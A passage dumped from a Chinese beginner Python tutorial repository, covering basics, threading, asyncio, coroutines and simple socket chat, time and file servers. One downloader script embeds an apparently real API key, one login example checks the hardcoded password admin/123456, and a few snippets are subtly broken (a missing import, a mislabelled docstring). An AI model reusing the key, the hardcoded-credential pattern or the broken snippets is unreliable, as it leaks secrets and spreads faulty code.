Exception as e: print(e) server = socket() server.bind(('10.7.189.118', 12345)) server.listen(512) clients = [] while True: curr_client, addr = server.accept() print(addr[0], '连接到服务器.') clients.append(curr_client) ClientHandler(curr_client).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/fileserver.py from socket import socket, SOCK_STREAM, AF_INET from base64 import b64encode from json import dumps from threading import Thread def main(): # 自定义线程类 class FileTransferHandler(Thread): def __init__(self, cclient): super().__init__() self.cclient = cclient def run(self): my_dict = {} my_dict['filename'] = 'guido.jpg' # JSON是纯文本不能携带二进制数据 # 所以图片的二进制数据要处理成base64编码 my_dict['filedata'] = data # 通过dumps函数将字典处理成JSON字符串 json_str = dumps(my_dict) # 发送JSON字符串 self.cclient.send(json_str.encode('utf-8')) self.cclient.close() # 1.创建套接字对象并指定使用哪种传输服务 server = socket() # 2.绑定IP地址和端口(区分不同的服务) server.bind(('192.168.1.2', 5566)) # 3.开启监听 - 监听客户端连接到服务器 server.listen(512) print('服务器启动开始监听...') with open('guido.jpg', 'rb') as f: # 将二进制数据处理成base64再解码成字符串 data = b64encode(f.read()).decode('utf-8') while True: client, addr = server.accept() # 用一个字典(键值对)来保存要发送的各种数据 # 待会可以将字典处理成JSON格式在网络上传递 FileTransferHandler(client).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/socket4.py """ 套接字 - 基于UDP协议创建Echo客户端 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * client = socket(AF_INET, SOCK_DGRAM) while True: data_str = input('请输入: ') client.sendto(data_str.encode('utf-8'), ('localhost', 6789)) data, addr = client.recvfrom(1024) data_str = data.decode('utf-8') print('服务器回应:', data_str) if data_str == 'bye': break client.close() File: Day01-15/code/Day14/mmdownloader.py from time import time from threading import Thread import requests class DownloadHanlder(Thread): def __init__(self, url): super().__init__() self.url = url def run(self): filename = self.url[self.url.rfind('/') + 1:] resp = requests.get(self.url) with open('/Users/Hao/Downloads/' + filename, 'wb') as f: f.write(resp.content) def main(): # 通过requests模块的get函数获取网络资源 resp = requests.get( 
'http://api.tianapi.com/meinv/?key=772a81a51ae5c780251b1f98ea431b84&num=10') # 将服务器返回的JSON格式的数据解析为字典 data_model = resp.json() for mm_dict in data_model['newslist']: url = mm_dict['picUrl'] # 通过多线程的方式实现图片下载 DownloadHanlder(url).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/chatclient.py from socket import socket from threading import Thread def main(): class RefreshScreenThread(Thread): def __init__(self, client): super().__init__() self._client = client def run(self): while running: data = self._client.recv(1024) print(data.decode('utf-8')) nickname = input('请输入你的昵称: ') myclient = socket() myclient.connect(('10.7.189.118', 12345)) running = True RefreshScreenThread(myclient).start() while running: content = input('请发言: ') if content == 'byebye': myclient.send(content.encode('utf-8')) running = False else: msg = nickname + ': ' + content myclient.send(msg.encode('utf-8')) if __name__ == '__main__': main() File: Day01-15/code/Day14/socket5.py """ 使用socketserver模块创建时间服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socketserver import TCPServer, StreamRequestHandler from time import * class EchoRequestHandler(StreamRequestHandler): def handle(self): currtime = localtime(time()) timestr = strftime('%Y-%m-%d %H:%M:%S', currtime) self.wfile.write(timestr.encode('utf-8')) server = TCPServer(('localhost', 6789), EchoRequestHandler) server.serve_forever() File: Day01-15/code/Day14/socket1.py """ 套接字 - 基于TCP协议创建时间服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * from time import * server = socket(AF_INET, SOCK_STREAM) server.bind(('localhost', 6789)) server.listen() print('服务器已经启动正在监听客户端连接.') while True: client, addr = server.accept() print('客户端%s:%d连接成功.' % (addr[0], addr[1])) currtime = localtime(time()) timestr = strftime('%Y-%m-%d %H:%M:%S', currtime) client.send(timestr.encode('utf-8')) client.close() server.close() File: Day01-15/code/Day14/timeserver.py from socket import socket, SOCK_STREAM, AF_INET from datetime import datetime def main(): # 1.创建套接字对象并指定使用哪种传输服务 # family=AF_INET - IPv4地址 # family=AF_INET6 - IPv6地址 # type=SOCK_STREAM - TCP套接字 # type=SOCK_DGRAM - UDP套接字 # type=SOCK_RAW - 原始套接字 server = socket(family=AF_INET, type=SOCK_STREAM) # 2.绑定IP地址和端口(区分不同的服务) server.bind(('192.168.1.2', 6789)) # 3.开启监听 - 监听客户端连接到服务器 server.listen(512) print('服务器启动开始监听...') # 4.通过循环接收客户端的连接并作出相应的处理(提供服务) while True: # accept方法是一个阻塞方法如果没有客户端连接到服务器 # 这个方法就会阻塞代码不会向下执行 # accept方法返回元组其中的第一个元素是客户端对象 # 第二个元素是客户端的地址(由IP和端口两部分构成) client, addr = server.accept() print(str(addr) + '连接到了服务器.') # 5.发送数据 client.send(str(datetime.now()).encode('utf-8')) # 6.断开连接 client.close() if __name__ == '__main__': main() File: Day01-15/code/Day14/socket2.py """ 套接字 - 基于TCP协议创建时间客户端 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * client = socket(AF_INET, SOCK_STREAM) client.connect(('localhost', 6789)) while True: data = client.recv(1024) if not data: break print(data.decode('utf-8')) client.close() File: Day01-15/code/Day14/socket3.py """ 套接字 - 基于UDP协议Echo服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * from time import * server = socket(AF_INET, SOCK_DGRAM) server.bind(('localhost', 6789)) while True: data, addr = server.recvfrom(1024) server.sendto(data, addr) server.close() File: Day01-15/code/Day14/timeclient.py from socket import socket def main(): client = socket() client.connect(('10.7.152.69', 6789)) print(client.recv(1024).decode('utf-8')) client.close() if __name__ == '__main__': main() File: Day01-15/code/Day13/multithread4.py """ 
使用多线程的情况 - 耗时间的任务在独立的线程中执行 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import tkinter import tkinter.messagebox from threading import Thread def main(): class DownloadTaskHandler(Thread): def run(self): # 模拟下载任务需要花费10秒钟时间 time.sleep(10) tkinter.messagebox.showinfo('提示', '下载完成!') # 启用下载按钮 button1.config(state=tkinter.NORMAL) def download(): # 禁用下载按钮 button1.config(state=tkinter.DISABLED) # 通过daemon参数将线程设置为守护线程(主程序退出就不再保留执行) DownloadTaskHandler(daemon=True).start() def show_about(): tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)') top = tkinter.Tk() top.title('单线程') top.geometry('200x150') top.wm_attributes('-topmost', 1) panel = tkinter.Frame(top) button1 = tkinter.Button(panel, text='下载', command=download) button1.pack(side='left') button2 = tkinter.Button(panel, text='关于', command=show_about) button2.pack(side='right') panel.pack(side='bottom') tkinter.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day13/singlethread1.py """ 不使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) sleep(time_to_download) print('下载完成! 耗费了%d秒' % time_to_download) def main(): start = time() download_task('Python从入门到住院.pdf') download_task('Peking Hot.avi') end = time() print('总共耗费了%.2f秒.' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/multithread1.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep import atexit import _thread def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) print('剩余时间%d秒.' % time_to_download) sleep(time_to_download) print('%s下载完成!' % filename) def shutdown_hook(start): end = time() print('总共耗费了%.3f秒.' 
% (end - start)) def main(): start = time() # 将多个下载任务放到多个线程中执行 thread1 = _thread.start_new_thread(download_task, ('Python从入门到住院.pdf',)) thread2 = _thread.start_new_thread(download_task, ('Peking Hot.avi',)) # 注册关机钩子在程序执行结束前计算执行时间 atexit.register(shutdown_hook, start) if __name__ == '__main__': main() # 执行这里的代码会引发致命错误(不要被这个词吓到) 因为主线程结束后下载线程再想执行就会出问题 # 需要说明一下 由于_thread模块属于比较底层的线程操作而且不支持守护线程的概念 # 在实际开发中会有诸多不便 因此我们推荐使用threading模块提供的高级操作进行多线程编程 File: Day01-15/code/Day13/generator1.py """ 生成器 - 生成器语法 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ seq = [x * x for x in range(10)] print(seq) gen = (x * x for x in range(10)) print(gen) for x in gen: print(x) num = 10 gen = (x ** y for x, y in zip(range(1, num), range(num - 1, 0, -1))) print(gen) n = 1 while n < num: print(next(gen)) n += 1 File: Day01-15/code/Day13/multithread5.py """ 多个线程共享数据 - 没有锁的情况 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from time import sleep from threading import Thread, Lock class Account(object): def __init__(self): self._balance = 0 self._lock = Lock() def deposit(self, money): # 先获取锁才能执行后续的代码 self._lock.acquire() try: new_balance = self._balance + money sleep(0.01) self._balance = new_balance finally: # 这段代码放在finally中保证释放锁的操作一定要执行 self._lock.release() @property def balance(self): return self._balance class AddMoneyThread(Thread): def __init__(self, account, money): super().__init__() self._account = account self._money = money def run(self): self._account.deposit(self._money) def main(): account = Account() threads = [] # 创建100个存款的线程向同一个账户中存钱 for _ in range(100): t = AddMoneyThread(account, 1) threads.append(t) t.start() # 等所有存款的线程都执行完毕∫ for t in threads: t.join() print('账户余额为: ¥%d元' % account.balance) if __name__ == '__main__': main() File: Day01-15/code/Day13/multiprocess1.py """ 使用Process类创建多个进程 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ # 通过下面程序的执行结果可以证实 父进程在创建子进程时复制了进程及其数据结构 # 每个进程都有自己独立的内存空间 所以进程之间共享数据只能通过IPC的方式 from multiprocessing import Process, Queue, current_process from time import sleep def sub_task(content, counts): print(f'PID: {current_process().pid}') counter = 0 while counter < counts: counter += 1 print(f'{counter}: {content}') sleep(0.01) def main(): number = random.randrange(5, 10) Process(target=sub_task, args=('Ping', number)).start() Process(target=sub_task, args=('Pong', number)).start() if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio1.py """ 异步I/O操作 - asyncio模块 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio import threading # import time @asyncio.coroutine def hello(): print('%s: hello, world!' % threading.current_thread()) # 休眠不会阻塞主线程因为使用了异步I/O操作 # 注意有yield from才会等待休眠操作执行完成 yield from asyncio.sleep(2) # asyncio.sleep(1) # time.sleep(1) print('%s: goodbye, world!' % threading.current_thread()) loop = asyncio.get_event_loop() tasks = [hello(), hello()] # 等待两个异步I/O操作执行结束 loop.run_until_complete(asyncio.wait(tasks)) print('game over!') loop.close() File: Day01-15/code/Day13/coroutine1.py """ 使用协程 - 模拟快递中心派发快递 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ from time import sleep from random import random def build_deliver_man(man_id): total = 0 while True: total += 1 print('%d号快递员准备接今天的第%d单.' % (man_id, total)) pkg = yield print('%d号快递员收到编号为%s的包裹.' 
% (man_id, pkg)) sleep(random() * 3) def package_center(deliver_man, max_per_day): num = 1 deliver_man.send(None) # next(deliver_man) while num <= max_per_day: package_id = 'PKG-%d' % num deliver_man.send(package_id) num += 1 sleep(0.1) deliver_man.close() print('今天的包裹派送完毕!') dm = build_deliver_man(1) package_center(dm, 10) # 两个函数虽然没有调用关系但是创建快递员的函数作为一个协程协助了快递中心函数完成任务 # 想一想如果有多个快递员的时候应该如何处理 File: Day01-15/code/Day13/multiprocess4.py from time import time def main(): total = 0 number_list = [x for x in range(1, 100000001)] start = time() for number in number_list: total += number print(total) end = time() print('Execution time: %.3fs' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/test2.py import time from threading import Thread, Lock class Account(object): def __init__(self, balance=0): self._balance = balance self._lock = Lock() @property def balance(self): return self._balance def deposit(self, money): # 当多个线程同时访问一个资源的时候 就有可能因为竞争资源导致资源的状态错误 # 被多个线程访问的资源我们通常称之为临界资源 对临界资源的访问需要加上保护 if money > 0: self._lock.acquire() try: new_balance = self._balance + money time.sleep(0.01) self._balance = new_balance finally: self._lock.release() class AddMoneyThread(Thread): def __init__(self, account): super().__init__() self._account = account def run(self): self._account.deposit(1) def main(): account = Account(1000) tlist = [] for _ in range(100): t = AddMoneyThread(account) tlist.append(t) t.start() for t in tlist: t.join() print('账户余额: %d元' % account.balance) if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio2.py """ 异步I/O操作 - async和await Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio import threading # 通过async修饰的函数不再是普通函数而是一个协程 # 注意async和await将在Python 3.7中作为关键字出现 async def hello(): print('%s: hello, world!' % threading.current_thread()) await asyncio.sleep(2) print('%s: goodbye, world!' % threading.current_thread()) loop = asyncio.get_event_loop() tasks = [hello(), hello()] # 等待两个异步I/O操作执行结束 loop.run_until_complete(asyncio.wait(tasks)) loop.close() File: Day01-15/code/Day13/coroutine2.py """ 使用协程 - 查看协程的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ from time import sleep from inspect import getgeneratorstate def build_deliver_man(man_id): total = 0 while True: total += 1 print('%d号快递员准备接今天的第%d单.' % (man_id, total)) pkg = yield print('%d号快递员收到编号为%s的包裹.' 
% (man_id, pkg)) sleep(0.5) def package_center(deliver_man, max_per_day): num = 1 # 创建状态(GEN_CREATED) - 等待开始执行 print(getgeneratorstate(deliver_man)) deliver_man.send(None) # 挂起状态(GEN_SUSPENDED) - 在yield表达式处暂停 print(getgeneratorstate(deliver_man)) # next(deliver_man) while num <= max_per_day: package_id = 'PKG-%d' % num deliver_man.send(package_id) num += 1 deliver_man.close() # 结束状态(GEN_CLOSED) - 执行完毕 print(getgeneratorstate(deliver_man)) print('今天的包裹派送完毕!') dm = build_deliver_man(1) package_center(dm, 10) File: Day01-15/code/Day13/multiprocess3.py """ 创建进程调用其他程序 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import subprocess import sys def main(): # 通过sys.argv获取命令行参数 if len(sys.argv) > 1: # 第一个命令行参数是程序本身所以从第二个开始取 for index in range(1, len(sys.argv)): try: # 通过subprocess模块的call函数启动子进程 status = subprocess.call(sys.argv[index]) except FileNotFoundError: print('不能执行%s命令' % sys.argv[index]) else: print('请使用命令行参数指定要执行的进程') if __name__ == '__main__': main() File: Day01-15/code/Day13/test3.py from random import randint from threading import Thread from time import sleep import pygame class Color(object): BLACK = (0, 0, 0) WHITE = (255, 255, 255) GRAY = (242, 242, 242) @staticmethod def random_color(): r = randint(0, 255) g = randint(0, 255) b = randint(0, 255) return r, g, b class Car(object): def __init__(self, x, y, color): self._x = x self._y = y self._color = color def move(self): if self._x + 80 < 950: self._x += randint(1, 10) def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, 80, 40), 0) def main(): class BackgroundTask(Thread): def run(self): while True: screen.fill(Color.GRAY) pygame.draw.line(screen, Color.BLACK, (130, 0), (130, 600), 4) pygame.draw.line(screen, Color.BLACK, (950, 0), (950, 600), 4) for car in cars: car.draw(screen) pygame.display.flip() sleep(0.05) for car in cars: car.move() cars = [] for index in range(5): temp = Car(50, 50 + 120 * index, Color.random_color()) cars.append(temp) pygame.init() screen = pygame.display.set_mode((1000, 600)) BackgroundTask(daemon=True).start() running = True while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio3.py """ 异步I/O操作 - asyncio模块 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio async def wget(host): print('wget %s...' 
% host) connect = asyncio.open_connection(host, 80) # 异步方式等待连接结果 reader, writer = await connect header = 'GET / HTTP/1.0\r\nHost: %s\r\n\r\n' % host writer.write(header.encode('utf-8')) # 异步I/O方式执行写操作 await writer.drain() while True: # 异步I/O方式执行读操作 line = await reader.readline() if line == b'\r\n': break print('%s header > %s' % (host, line.decode('utf-8').rstrip())) writer.close() loop = asyncio.get_event_loop() # 通过生成式语法创建一个装了三个协程的列表 hosts_list = ['www.sina.com.cn', 'www.sohu.com', 'www.163.com'] tasks = [wget(host) for host in hosts_list] # 下面的方法将异步I/O操作放入EventLoop直到执行完毕 loop.run_until_complete(asyncio.wait(tasks)) loop.close() File: Day01-15/code/Day13/multiprocess2.py """ 实现进程间的通信 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import multiprocessing import os def sub_task(queue): print('子进程进程号:', os.getpid()) counter = 0 while counter < 1000: queue.put('Pong') counter += 1 if __name__ == '__main__': print('当前进程号:', os.getpid()) queue = multiprocessing.Queue() p = multiprocessing.Process(target=sub_task, args=(queue,)) p.start() counter = 0 while counter < 1000: queue.put('Ping') counter += 1 p.join() print('子任务已经完成.') for _ in range(2000): print(queue.get(), end='') File: Day01-15/code/Day13/multithread2.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from threading import Thread from time import time, sleep def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) sleep(time_to_download) print('%s下载完成! 耗费了%d秒' % (filename, time_to_download)) def main(): start = time() thread1 = Thread(target=download_task, args=('Python从入门到住院.pdf',)) thread1.start() thread2 = Thread(target=download_task, args=('Peking Hot.avi',)) thread2.start() thread1.join() thread2.join() end = time() print('总共耗费了%.3f秒' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/generator2.py """ 生成器 - 使用yield关键字 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ def fib(num): n, a, b = 0, 0, 1 while n < num: yield b a, b = b, a + b n += 1 for x in fib(20): print(x) File: Day01-15/code/Day13/multithread6.py """ 多个线程共享数据 - 有锁的情况 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import threading class Account(object): def __init__(self): self._balance = 0 self._lock = threading.Lock() def deposit(self, money): # 获得锁后代码才能继续执行 self._lock.acquire() try: new_balance = self._balance + money time.sleep(0.01) self._balance = new_balance finally: # 操作完成后一定要记着释放锁 self._lock.release() @property def balance(self): return self._balance if __name__ == '__main__': account = Account() # 创建100个存款的线程向同一个账户中存钱 for _ in range(100): threading.Thread(target=account.deposit, args=(1,)).start() # 等所有存款的线程都执行完毕 time.sleep(2) print('账户余额为: ¥%d元' % account.balance) # 想一想结果为什么不是我们期望的100元 File: Day01-15/code/Day13/singlethread2.py """ 不使用多线程的情况 - 耗时间的任务阻塞主事件循环 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import tkinter import tkinter.messagebox def download(): # 模拟下载任务需要花费10秒钟时间 time.sleep(10) tkinter.messagebox.showinfo('提示', '下载完成!') def show_about(): tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)') def main(): top = tkinter.Tk() top.title('单线程') top.geometry('200x150') top.wm_attributes('-topmost', True) panel = tkinter.Frame(top) button1 = tkinter.Button(panel, text='下载', command=download) button1.pack(side='left') button2 = tkinter.Button(panel, text='关于', command=show_about) button2.pack(side='right') panel.pack(side='bottom') tkinter.mainloop() if __name__ == '__main__': main() # 在不使用多线程的情况下 一旦点击下载按钮 由于该操作需要花费10秒中的时间 # 
整个主消息循环也会被阻塞10秒钟无法响应其他的事件 # 事实上 对于没有因果关系的子任务 这种顺序执行的方式并不合理 File: Day01-15/code/Day13/multithread3.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep import threading class DownloadTask(threading.Thread): def __init__(self, filename): super().__init__() self._filename = filename def run(self): print('开始下载%s...' % self._filename) time_to_download = randint(5, 10) print('剩余时间%d秒.' % time_to_download) sleep(time_to_download) print('%s下载完成!' % self._filename) def main(): start = time() # 将多个下载任务放到多个线程中执行 # 通过自定义的线程类创建线程对象 线程启动后会回调执行run方法 thread1 = DownloadTask('Python从入门到住院.pdf') thread1.start() thread2 = DownloadTask('Peking Hot.avi') thread2.start() thread1.join() thread2.join() end = time() print('总共耗费了%.3f秒' % (end - start)) if __name__ == '__main__': main() # 请注意通过threading.Thread创建的线程默认是非守护线程 File: Day01-15/code/Day04/for2.py """ 用for循环实现1~100之间的偶数求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 for x in range(2, 101, 2): sum += x print(sum) File: Day01-15/code/Day04/for6.py """ 打印各种三角形图案 * ** *** **** ***** * ** *** **** ***** * *** ***** ******* ********* Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ row = int(input('请输入行数: ')) for i in range(row): for _ in range(i + 1): print('*', end='') print() for i in range(row): for j in range(row): if j < row - i - 1: print(' ', end='') else: print('*', end='') print() for i in range(row): for _ in range(row - i - 1): print(' ', end='') for _ in range(2 * i + 1): print('*', end='') print() File: Day01-15/code/Day04/while1.py """ 用while循环实现1~100求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 num = 1 while num <= 100: sum += num num += 1 print(sum) File: Day01-15/code/Day04/for3.py """ 输入非负整数n计算n! Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ n = int(input('n = ')) result = 1 for x in range(1, n + 1): result *= x print('%d! 
= %d' % (n, result)) File: Day01-15/code/Day04/while2.py """ 用while循环实现1~100之间的偶数求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum, num = 0, 2 while num <= 100: sum += num num += 2 print(sum) File: Day01-15/code/Day04/for4.py """ 输入一个正整数判断它是不是素数 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ from math import sqrt num = int(input('请输入一个正整数: ')) end = int(sqrt(num)) is_prime = True for x in range(2, end + 1): if num % x == 0: is_prime = False break if is_prime and num != 1: print('%d是素数' % num) else: print('%d不是素数' % num) File: Day01-15/code/Day04/for1.py """ 用for循环实现1~100求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 for x in range(1, 101): sum += x print(sum) File: Day01-15/code/Day04/for5.py """ 输入两个正整数计算最大公约数和最小公倍数 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ x = int(input('x = ')) y = int(input('y = ')) if x > y: (x, y) = (y, x) for factor in range(x, 0, -1): if x % factor == 0 and y % factor == 0: print('%d和%d的最大公约数是%d' % (x, y, factor)) print('%d和%d的最小公倍数是%d' % (x, y, x * y // factor)) break File: Day01-15/code/Day03/tax.py """ 输入月收入和五险一金计算个人所得税 说明:写这段代码时新的个人所得税计算方式还没有颁布 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ salary = float(input('本月收入: ')) insurance = float(input('五险一金: ')) diff = salary - insurance - 3500 if diff <= 0: rate = 0 deduction = 0 elif diff < 1500: rate = 0.03 deduction = 0 elif diff < 4500: rate = 0.1 deduction = 105 elif diff < 9000: rate = 0.2 deduction = 555 elif diff < 35000: rate = 0.25 deduction = 1005 elif diff < 55000: rate = 0.3 deduction = 2755 elif diff < 80000: rate = 0.35 deduction = 5505 else: rate = 0.45 deduction = 13505 tax = abs(diff * rate - deduction) print('个人所得税: ¥%.2f元' % tax) print('实际到手收入: ¥%.2f元' % (diff + 3500 - tax)) File: Day01-15/code/Day03/conversion.py """ 英制单位英寸和公制单位厘米互换 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ value = float(input('请输入长度: ')) unit = input('请输入单位: ') if unit == 'in' or unit == '英寸': print('%f英寸 = %f厘米' % (value, value * 2.54)) elif unit == 'cm' or unit == '厘米': print('%f厘米 = %f英寸' % (value, value / 2.54)) else: print('请输入有效的单位') File: Day01-15/code/Day03/rolldice.py """ 掷骰子决定做什么事情 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ from random import randint face = randint(1, 6) if face == 1: result = '唱首歌' elif face == 2: result = '跳个舞' elif face == 3: result = '学狗叫' elif face == 4: result = '做俯卧撑' elif face == 5: result = '念绕口令' else: result = '讲冷笑话' print(result) File: Day01-15/code/Day03/triangle.py """ 判断输入的边长能否构成三角形 如果能则计算出三角形的周长和面积 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ import math a = float(input('a = ')) b = float(input('b = ')) c = float(input('c = ')) if a + b > c and a + c > b and b + c > a: print('周长: %f' % (a + b + c)) p = (a + b + c) / 2 area = math.sqrt(p * (p - a) * (p - b) * (p - c)) print('面积: %f' % (area)) else: print('不能构成三角形') File: Day01-15/code/Day03/verify.py """ 用户身份验证 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ # import getpass # from getpass import getpass # from getpass import * username = input('请输入用户名: ') password = input('请输入口令: ') # 输入口令的时候终端中没有回显 # password = getpass.getpass('请输入口令: ') if username == 'admin' and password == '123456': print('身份验证成功!') else: print('身份验证失败!') File: Day01-15/code/Day03/piecewise.py """ 分段函数求值 3x - 5 (x > 1) f(x) = x + 2 (-1 <= x <= 1) 5x + 3 (x < -1) Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ x = float(input('x = ')) if x > 1: y = 3 * x - 5 elif x >= -1: y = x + 2 else: y = 5 * x + 3 print('f(%.2f) = %.2f' % (x, y)) File: Day01-15/code/Day03/grade.py """ 百分制成绩转等级制成绩 90分以上,输出A 80分~89分,输出B 70分~79分,输出C 60分~69分,输出D 60分以下,输出E Version: 0.1 
Author: 骆昊 Date: 2018-02-28 """ score = float(input('请输入成绩: ')) if score >= 90: grade = 'A' elif score >= 80: grade = 'B' elif score >= 70: grade = 'C' elif score >= 60: grade = 'D' else: grade = 'E' print('对应的等级是:', grade) File: Day01-15/code/Day02/variable2.py """ 将input函数输入的数据保存在变量中并进行操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = int(input('a = ')) b = int(input('b = ')) print(a + b) print(a - b) print(a * b) print(a / b) print(a // b) print(a % b) print(a ** b) File: Day01-15/code/Day02/leap.py """ 输入年份 如果是闰年输出True 否则输出False Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ year = int(input('请输入年份: ')) # 如果代码太长写成一行不便于阅读 可以使用\或()折行 is_leap = (year % 4 == 0 and year % 100 != 0 or year % 400 == 0) print(is_leap) File: Day01-15/code/Day02/variable3.py """ 格式化输出 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = int(input('a = ')) b = int(input('b = ')) print('%d + %d = %d' % (a, b, a + b)) print('%d - %d = %d' % (a, b, a - b)) print('%d * %d = %d' % (a, b, a * b)) print('%d / %d = %f' % (a, b, a / b)) print('%d // %d = %d' % (a, b, a // b)) print('%d %% %d = %d' % (a, b, a % b)) print('%d ** %d = %d' % (a, b, a ** b)) File: Day01-15/code/Day02/circle.py """ 输入半径计算圆的周长和面积 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ import math radius = float(input('请输入圆的半径: ')) perimeter = 2 * math.pi * radius area = math.pi * radius * radius print('周长: %.2f' % perimeter) print('面积: %.2f' % area) File: Day01-15/code/Day02/operator.py """ 运算符的使用 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 5 b = 10 c = 3 d = 4 e = 5 a += b a -= c a *= d a /= e print("a = ", a) flag1 = 3 > 2 flag2 = 2 < 1 flag3 = flag1 and flag2 flag4 = flag1 or flag2 flag5 = not flag1 print("flag1 = ", flag1) print("flag2 = ", flag2) print("flag3 = ", flag3) print("flag4 = ", flag4) print("flag5 = ", flag5) print(flag1 is True) print(flag2 is not False) File: Day01-15/code/Day02/centigrade.py """ 将华氏温度转换为摄氏温度 F = 1.8C + 32 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ f = float(input('请输入华氏温度: ')) c = (f - 32) / 1.8 print('%.1f华氏度 = %.1f摄氏度' % (f, c)) File: Day01-15/code/Day02/variable4.py """ 检查变量的类型 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 100 b = 1000000000000000000 c = 12.345 d = 1 + 5j e = 'A' f = 'hello, world' g = True print(type(a)) print(type(b)) print(type(c)) print(type(d)) print(type(e)) print(type(f)) print(type(g)) File: Day01-15/code/Day02/variable5.py """ 类型转换 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 100 b = str(a) c = 12.345 d = str(c) e = '123' f = int(e) g = '123.456' h = float(g) i = False j = str(i) k = 'hello' m = bool(k) print(a) print(type(a)) print(b) print(type(b)) print(c) print(type(c)) print(d) print(type(d)) print(e) print(type(e)) print(f) print(type(f)) print(g) print(type(g)) print(h) print(type(h)) print(i) print(type(i)) print(j) print(type(j)) print(k) print(type(k)) print(m) print(type(m)) File: Day01-15/code/Day02/strings.py """ 字符串常用操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ str1 = 'hello, world!' 
print('字符串的长度是:', len(str1)) print('单词首字母大写: ', str1.title()) print('字符串变大写: ', str1.upper()) # str1 = str1.upper() print('字符串是不是大写: ', str1.isupper()) print('字符串是不是以hello开头: ', str1.startswith('hello')) print('字符串是不是以hello结尾: ', str1.endswith('hello')) print('字符串是不是以感叹号开头: ', str1.startswith('!')) print('字符串是不是一感叹号结尾: ', str1.endswith('!')) str2 = '- \u9a86\u660a' str3 = str1.title() + ' ' + str2.lower() print(str3) File: Day01-15/code/Day02/variable1.py """ 使用变量保存数据并进行操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 321 b = 123 print(a + b) print(a - b) print(a * b) print(a / b) print(a // b) print(a % b) print(a ** b) File: Day01-15/code/Day05/prime.py """ 输出2~99之间的素数 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import math for num in range(2, 100): is_prime = True for factor in range(2, int(math.sqrt(num)) + 1): if num % factor == 0: is_prime = False break if is_prime: print(num, end=' ') File: Day01-15/code/Day05/palindrome.py """ 判断输入的正整数是不是回文数 回文数是指将一个正整数从左往右排列和从右往左排列值一样的数 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ num = int(input('请输入一个正整数: ')) temp = num num2 = 0 while temp > 0: num2 *= 10 num2 += temp % 10 temp //= 10 if num == num2: print('%d是回文数' % num) else: print('%d不是回文数' % num) File: Day01-15/code/Day05/guess.py """ 猜数字游戏 计算机出一个1~100之间的随机数由人来猜 计算机根据人猜的数字分别给出提示大一点/小一点/猜对了 Version: 0.1 Author: 骆昊 